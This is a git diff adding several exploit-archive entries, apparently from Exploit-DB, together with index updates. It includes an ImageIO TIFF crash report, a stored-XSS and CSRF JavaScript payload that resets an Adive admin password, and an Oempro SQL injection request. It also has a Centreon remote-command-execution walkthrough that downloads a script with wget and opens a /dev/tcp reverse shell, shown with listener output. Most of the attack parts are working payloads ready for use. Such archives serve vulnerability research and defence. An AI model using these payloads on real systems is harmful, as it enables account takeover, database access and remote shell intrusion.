diff --git a/exploits/multiple/dos/47970.txt b/exploits/multiple/dos/47970.txt new file mode 100644 index 000000000..6f0e2692f --- /dev/null +++ b/exploits/multiple/dos/47970.txt @@ -0,0 +1,55 @@ +The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code (tester.m) can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should crash with an access violation similar to the following: + + % ./tester fuzzed.tif + AddressSanitizer:DEADLYSIGNAL + ================================================================= + ==70578==ERROR: AddressSanitizer: SEGV on unknown address 0x00010decf000 (pc 0x7fff3a588390 bp 0x7ffee8fbb6d0 sp 0x7ffee8fbb0e0 T0) + ==70578==The signal is caused by a WRITE memory access. + #0 0x7fff3a58838f in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector >&) (ImageIO:x86_64h+0xab38f) + #1 0x7fff6e8ca512 in _dispatch_client_callout2 (libdispatch.dylib:x86_64+0x3512) + #2 0x7fff6e8dabcb in _dispatch_apply_serial (libdispatch.dylib:x86_64+0x13bcb) + #3 0x7fff6e8ca4dd in _dispatch_client_callout (libdispatch.dylib:x86_64+0x34dd) + #4 0x7fff6e8cde62 in _dispatch_sync_function_invoke (libdispatch.dylib:x86_64+0x6e62) + #5 0x7fff6e8daaf4 in dispatch_apply_f (libdispatch.dylib:x86_64+0x13af4) + #6 0x7fff3a587028 in TIFFReadPlugin::CallDecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, IIORequest, std::__1::vector >&) (Imag + eIO:x86_64h+0xaa028) + #7 0x7fff3a513f29 in TIFFReadPlugin::copyImageBlockSet(InfoRec*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x36f29) + #8 0x7fff3a4f7a1d in IIO_Reader::CopyImageBlockSetProc(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x1aa1d) + #9 0x7fff3a4f6dfe in IIOImageProviderInfo::CopyImageBlockSetWithOptions(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x19dfe) + #10 0x7fff37a9eb13 in imageProvider_retain_data (CoreGraphics:x86_64h+0x3cb13) + #11 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) + #12 0x7fff37a9eab1 in provider_for_destination_retain_data (CoreGraphics:x86_64h+0x3cab1) + #13 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f) + #14 0x7fff37a9e949 in CGAccessSessionCreate (CoreGraphics:x86_64h+0x3c949) + #15 0x7fff37a9cb8c in img_data_lock (CoreGraphics:x86_64h+0x3ab8c) + #16 0x7fff37a9839a in CGSImageDataLock (CoreGraphics:x86_64h+0x3639a) + #17 0x7fff37a97d92 in RIPImageDataInitializeShared (CoreGraphics:x86_64h+0x35d92) + #18 0x7fff37a97951 in RIPImageCacheGetRetained (CoreGraphics:x86_64h+0x35951) + #19 0x7fff37a97426 in ripc_AcquireRIPImageData (CoreGraphics:x86_64h+0x35426) + #20 0x7fff37a966eb in ripc_DrawImage (CoreGraphics:x86_64h+0x346eb) + #21 0x7fff37a95a1f in CGContextDrawImageWithOptions (CoreGraphics:x86_64h+0x33a1f) + #22 0x106c42aab in main (tester:x86_64+0x100001aab) + #23 0x7fff6e91a404 in start (libdyld.dylib:x86_64+0x11404) + + ==70578==Register values: + rax = 0xffffffffffffff01 rbx = 0x0000800080008080 rcx = 0x0000000000000080 rdx = 0x0000000000000008 + rdi = 0x0000000000000000 rsi = 0x0000000000000000 rbp = 0x00007ffee8fbb6d0 rsp = 0x00007ffee8fbb0e0 + r8 = 0x0000632000003002 r9 = 0x00000000000000ff r10 = 0x0000800080008080 r11 = 0xfffffffffffffff0 + r12 = 0x0000000000000001 r13 = 0x000000010decf000 r14 = 0x0000000000000008 r15 = 0x0000000000000000 + AddressSanitizer can not provide additional info. + SUMMARY: AddressSanitizer: SEGV (ImageIO:x86_64h+0xab38f) in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector >&) + ==70578==ABORTING + +The overflow happens out of an mmap region as the memory buffer is allocated using ImageIO_Malloc, which is itself mostly a thin wrapper around mmap. + +The crashing image was found through fuzzing and both the crashing as well as the original image are attached. The relevant byte change removes the BitsPerSample entry (original value is 8) from the TIFF file, in which case a default value of 1 will be used. As the SamplesPerPixel entry is still 3, the image will contain 3 bits per pixel, one for the red, one for the green, and one for the blue component. ImageIO will then allocate width*height*3 bytes of memory (for a RBG bitmap) using ImageIO_Malloc, then call TIFFReadPlugin::DecodeBlocks to write the image data into the buffer. Next, ImageIO uses the tile-oriented TIFF api [1] to read out a tile of the image in its current encoding (3 bits per pixel). The default tile size seems to be 0x100 x 0x100 and so the entire image (which is 143 x 190 pixels large) fits into one tile. Since there are three bits per pixel, the tile has a total of 0x100*0x100*3/8 = 0x6000 bytes, which is what TIFFReadTile returns. Finally, it appears that ImageIO then uses the returned size (0x6000) to decode the image instead of the correct image size (143 x 190). As such, it writes 0x6000*8 bytes (since the output format uses 8 bits per component, not 1) to the output buffer, or about 2.4 times the allocated size. The program then crashes with a memory violation. + +Since the buffer is already allocated using mmap, adding a guard page after it would likely prevent this and similar bugs from being exploitable in the future. + +The attached archive contains the original image and the mutated one causing the crash. It also contains code to reproduce the issue on macOS and iOS. Finally, it contains a python script to change the byte in question in the original file to remove the BitsPerSample entry and thus trigger the issue. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47970.zip \ No newline at end of file diff --git a/exploits/php/webapps/47966.txt b/exploits/php/webapps/47966.txt new file mode 100644 index 000000000..136d0cd0b --- /dev/null +++ b/exploits/php/webapps/47966.txt @@ -0,0 +1,93 @@ +# Exploit Title: Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password) +# Exploit Author: Sarthak Saini +# Date: 2020-01-18 +# Vendor Link : https://www.adive.es/ +# Software Link: https://github.com/ferdinandmartin/adive-php7 +# Version: 2.0.8 +# CVE:CVE-2020-7991 +# Category: Webapps +# Tested on: windows64bit / mozila firefox +# +# +|--!> + +|---------------------------------------------------------------------------------- + +1) Persistent Cross-site Scripting at user add page + +Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 62 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=test&userUsername=&pass=test&cpass=test&permission=3 + + +|---------------------------------------------------------------------------------- + + +2) account takeover - cross side request forgery (Change Admin Password) + + +Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger. + +-> Save the payload as exp.js + +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- +function execute() +{ + var nuri ="http://192.168.2.5/admin/config"; + xhttp = new XMLHttpRequest(); + xhttp.open("POST", nuri, true); + xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xhttp.withCredentials = "true"; + var body = ""; + body += "\r\n\r\n"; + body += + "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web"; + xhttp.send(body); + return true; +} + +execute(); +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==- + +-> Start a server and host the exp.js. Send the exp.js file in the xss payload + +Payload:- + +POST /admin/user/add HTTP/1.1 +Host: 192.168.2.5 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Origin: http://192.168.2.5 +DNT: 1 +Connection: close +Referer: http://192.168.2.5/admin/user/add +Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4 +Upgrade-Insecure-Requests: 1 + +userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3 + + +-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123 + +|-----------------------------------------EOF----------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/47967.txt b/exploits/php/webapps/47967.txt new file mode 100644 index 000000000..5e8006187 --- /dev/null +++ b/exploits/php/webapps/47967.txt @@ -0,0 +1,24 @@ +# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection +# Date: 2020-01-27 +# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br) +# Vendor Homepage: www2.octeth.com +# Version: Octeth Oempro v.4.7 and v.4.8 +# Tested on: Oempro v.4.7 +# CVE : CVE-2019-19740 + + +An authenticated user can easily exploit this vulnerability. Octeth Oempro +4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get +is vulnerable. + +# Error condition +POST /api.php HTTP/1.1 +Host: 127.0.0.1 + +command=Campaign.Get&CampaignID=2019'&responseformat=JSON + +# SQL Injection exploitation +POST /api.php HTTP/1.1 +Host: 127.0.0.1 + +command=Campaign.Get&CampaignID=2019 OR '1=1&responseformat=JSON \ No newline at end of file diff --git a/exploits/php/webapps/47968.txt b/exploits/php/webapps/47968.txt new file mode 100644 index 000000000..494efaa1c --- /dev/null +++ b/exploits/php/webapps/47968.txt @@ -0,0 +1,42 @@ +# Exploit Title: Centreon 19.10.5 - Database Credentials Disclosure +# Date: 2020-01-27 +# Exploit Author: Fabien AUNAY, Omri Baso +# Vendor Homepage: https://www.centreon.com/ +# Software Link: https://github.com/centreon/centreon +# Version: 19.10.5 +# Tested on: CentOS 7 +# CVE : - + +########################################################################################################### +Centreon 19.10.5 Database Credentials Disclosure + +Trusted by SMBs and Fortune 500 companies worldwide. +An industry reference in IT Infrastructure monitoring for the enterprise. +Counts 200,000+ ITOM users worldwide and an international community of software collaborators. +Presence in Toronto and Luxembourg. +Deployed in diverse sectors: +- IT & telecommunication +- Transportation +- Government +- Heath care +- Retail +- Utilities +- Finance & Insurance +- Aerospace & Defense +- Manufacturing +- etc. + +########################################################################################################### + +POC: + +- Configuration / Pollers / Broker configuration +-- Central-broker | Central-broker-master +--- Output + +It is possible to discover the unencrypted password with the inspector. + + +DB user centreon +DB password ******** + \ No newline at end of file diff --git a/exploits/php/webapps/47969.txt b/exploits/php/webapps/47969.txt new file mode 100644 index 000000000..45370e323 --- /dev/null +++ b/exploits/php/webapps/47969.txt @@ -0,0 +1,143 @@ +# Exploit Title: Centreon 19.10.5 - Remote Command Execution +# Date: 2020-01-27 +# Exploit Author: Fabien AUNAY, Omri BASO +# Vendor Homepage: https://www.centreon.com/ +# Software Link: https://github.com/centreon/centreon +# Version: 19.10.5 +# Tested on: CentOS 7 +# CVE : - + +########################################################################################################### +Centreon 19.10.5 Remote Command Execution Resources + +Trusted by SMBs and Fortune 500 companies worldwide. +An industry reference in IT Infrastructure monitoring for the enterprise. +Counts 200,000+ ITOM users worldwide and an international community of software collaborators. +Presence in Toronto and Luxembourg. +Deployed in diverse sectors: +- IT & telecommunication +- Transportation +- Government +- Heath care +- Retail +- Utilities +- Finance & Insurance +- Aerospace & Defense +- Manufacturing +- etc. + +It is possible to call binaries not only in default $USER$ path by adding Poller's Resources. +By adding two entries it is possible to trigger a download exec reverse shell. +Note, your reverse shell is persistent because Centreon execute your payloads all 10 minutes by default. + +Steps: +Objective 1 : Add Download Resource +Objective 2 : Add Exec Resource +Objective 3 : Create your both commands check +Objective 4 : Create your services and link them with a host + +Restart the Central. + +########################################################################################################### + +# Objective 1 : Add Download Resource +- Configuration/Pollers/Resources + +- Problem: +Illegal Object Name Characters : ~!$%^&*"|'<>?,()= +Illegal Macro Output Characters : `~$^&"|'<> +Maximum client side input size limit: 35 + +- Information: +Read Centreon documentation: +To install Centreon software from the repository, you should first install the centreon-release package, +which will provide the repository file. Some may not have the wget package installed. +If not perform the following : yum install wget + +Solution 1: Remove restriction in Configuration/Pollers/Engine configuration +Solution 2: Modify input size inspector in client side size="250" +Solution 3: Mixed, use a custom payload -> wget -P /tmp/ 127.0.0.1:8080/x.sh + + +# Objective 2 : Add Exec Resource +- Configuration/Pollers/Resources + +- Problem: +Illegal Object Name Characters : ~!$%^&*"|'<>?,()= +Illegal Macro Output Characters : `~$^&"|'<> +Maximum client side input size limit: 35 + +Solution: Use a custom payload -> bash /tmp/x.sh + + +# Objective 3 : Create your both commands check with your resources $xxx$ without arguments +# Objective 4 : Create your services and link them with a host + + +POC: +Payload x.sh : 0<&121-;exec 121<>/dev/tcp/127.0.0.1/1234;sh <&121 >&121 2>&121 + +python -m SimpleHTTPServer 8080 +Serving HTTP on 0.0.0.0 port 8080 ... +127.0.0.1 - - [27/Jan/2020 22:13:27] "GET /x.sh HTTP/1.1" 200 - + + +nc -lvnp 1234 +Ncat: Version 7.50 +Ncat: Listening on :::1234 +Ncat: Listening on 0.0.0.0:1234 +Ncat: Connection from 127.0.0.1. +Ncat: Connection from 127.0.0.1:43128. +id +uid=993(centreon-engine) gid=990(centreon-engine) groups=990(centreon-engine),992(centreon-broker),993(nagios),994(centreon) +sudo -l +Matching Defaults entries for centreon-engine on centreon-lab: + !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, + env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", + env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", + env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", + env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", + env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", + secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin, !requiretty + +User centreon-engine may run the following commands on centreon-lab: + (root) NOPASSWD: /sbin/service centreontrapd start + (root) NOPASSWD: /sbin/service centreontrapd stop + (root) NOPASSWD: /sbin/service centreontrapd restart + (root) NOPASSWD: /sbin/service centreontrapd reload + (root) NOPASSWD: /usr/sbin/service centreontrapd start + (root) NOPASSWD: /usr/sbin/service centreontrapd stop + (root) NOPASSWD: /usr/sbin/service centreontrapd restart + (root) NOPASSWD: /usr/sbin/service centreontrapd reload + (root) NOPASSWD: /sbin/service centengine start + (root) NOPASSWD: /sbin/service centengine stop + (root) NOPASSWD: /sbin/service centengine restart + (root) NOPASSWD: /sbin/service centengine reload + (root) NOPASSWD: /usr/sbin/service centengine start + (root) NOPASSWD: /usr/sbin/service centengine stop + (root) NOPASSWD: /usr/sbin/service centengine restart + (root) NOPASSWD: /usr/sbin/service centengine reload + (root) NOPASSWD: /bin/systemctl start centengine + (root) NOPASSWD: /bin/systemctl stop centengine + (root) NOPASSWD: /bin/systemctl restart centengine + (root) NOPASSWD: /bin/systemctl reload centengine + (root) NOPASSWD: /usr/bin/systemctl start centengine + (root) NOPASSWD: /usr/bin/systemctl stop centengine + (root) NOPASSWD: /usr/bin/systemctl restart centengine + (root) NOPASSWD: /usr/bin/systemctl reload centengine + (root) NOPASSWD: /sbin/service cbd start + (root) NOPASSWD: /sbin/service cbd stop + (root) NOPASSWD: /sbin/service cbd restart + (root) NOPASSWD: /sbin/service cbd reload + (root) NOPASSWD: /usr/sbin/service cbd start + (root) NOPASSWD: /usr/sbin/service cbd stop + (root) NOPASSWD: /usr/sbin/service cbd restart + (root) NOPASSWD: /usr/sbin/service cbd reload + (root) NOPASSWD: /bin/systemctl start cbd + (root) NOPASSWD: /bin/systemctl stop cbd + (root) NOPASSWD: /bin/systemctl restart cbd + (root) NOPASSWD: /bin/systemctl reload cbd + (root) NOPASSWD: /usr/bin/systemctl start cbd + (root) NOPASSWD: /usr/bin/systemctl stop cbd + (root) NOPASSWD: /usr/bin/systemctl restart cbd + (root) NOPASSWD: /usr/bin/systemctl reload cbd \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 86655d434..e43feab29 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6663,6 +6663,7 @@ id,file,description,date,author,type,platform,port 47952,exploits/multiple/dos/47952.txt,"KeePass 2.44 - Denial of Service (PoC)",2020-01-22,"Mustafa Emre Gül",dos,multiple, 47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows, 47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows, +47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -17949,7 +17950,7 @@ id,file,description,date,author,type,platform,port 47891,exploits/java/remote/47891.txt,"JetBrains TeamCity 2018.2.4 - Remote Code Execution",2020-01-08,hantwister,remote,java, 47924,exploits/linux/remote/47924.rb,"Barco WePresent - file_transfer.cgi Command Injection (Metasploit)",2020-01-15,Metasploit,remote,linux, 47936,exploits/hardware/remote/47936.js,"Sagemcom F@ST 3890 (50_10_19-T1) Cable Modem - 'Cable Haunt' Remote Code Execution",2020-01-15,Lyrebirds,remote,hardware, -47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux, +47956,exploits/linux/remote/47956.py,"Pachev FTP Server 1.0 - Path Traversal",2020-01-23,1F98D,remote,linux,21 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -42257,10 +42258,14 @@ id,file,description,date,author,type,platform,port 47941,exploits/php/webapps/47941.py,"Wordpress Time Capsule Plugin 1.21.16 - Authentication Bypass",2020-01-17,"B. Canavate",webapps,php, 47946,exploits/php/webapps/47946.txt,"Adive Framework 2.0.8 - Persistent Cross-Site Scripting",2020-01-20,"Sarthak Saini",webapps,php, 47948,exploits/php/webapps/47948.rb,"Centreon 19.04 - Authenticated Remote Code Execution (Metasploit)",2020-01-20,TheCyberGeek,webapps,php, -47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java, +47949,exploits/java/webapps/47949.txt,"ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection",2020-01-21,"Ertebat Gostar Co",webapps,java,80 47954,exploits/php/webapps/47954.py,"qdPM 9.1 - Remote Code Execution",2020-01-23,"Rishal Dwivedi",webapps,php, 47951,exploits/xml/webapps/47951.py,"Citrix XenMobile Server 10.8 - XML External Entity Injection",2020-01-22,"Jonas Lejon",webapps,xml, 47958,exploits/hardware/webapps/47958.txt,"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot",2020-01-24,PCEumel,webapps,hardware, -47959,exploits/php/webapps/47959.txt,"Webtareas 2.0 - 'id' SQL Injection",2020-01-24,Greg.Priest,webapps,php, -47960,exploits/asp/webapps/47960.txt,"OLK Web Store 2020 - Cross-Site Request Forgery",2020-01-24,"Joel Aviad Ossi",webapps,asp, +47959,exploits/php/webapps/47959.txt,"Webtareas 2.0 - 'id' SQL Injection",2020-01-24,Greg.Priest,webapps,php,80 +47960,exploits/asp/webapps/47960.txt,"OLK Web Store 2020 - Cross-Site Request Forgery",2020-01-24,"Joel Aviad Ossi",webapps,asp,80 47961,exploits/hardware/webapps/47961.txt,"Genexis Platinum-4410 2.1 - Authentication Bypass",2020-01-24,"Husinul Sanub",webapps,hardware, +47966,exploits/php/webapps/47966.txt,"Adive Framework 2.0.8 - Cross-Site Request Forgery (Change Admin Password)",2020-01-28,"Sarthak Saini",webapps,php, +47967,exploits/php/webapps/47967.txt,"Octeth Oempro 4.8 - 'CampaignID' SQL Injection",2020-01-28,"Bruno de Barros Bulle",webapps,php,80 +47968,exploits/php/webapps/47968.txt,"Centreon 19.10.5 - Database Credentials Disclosure",2020-01-28,"Fabien AUNAY",webapps,php, +47969,exploits/php/webapps/47969.txt,"Centreon 19.10.5 - Remote Command Execution",2020-01-28,"Fabien AUNAY",webapps,php,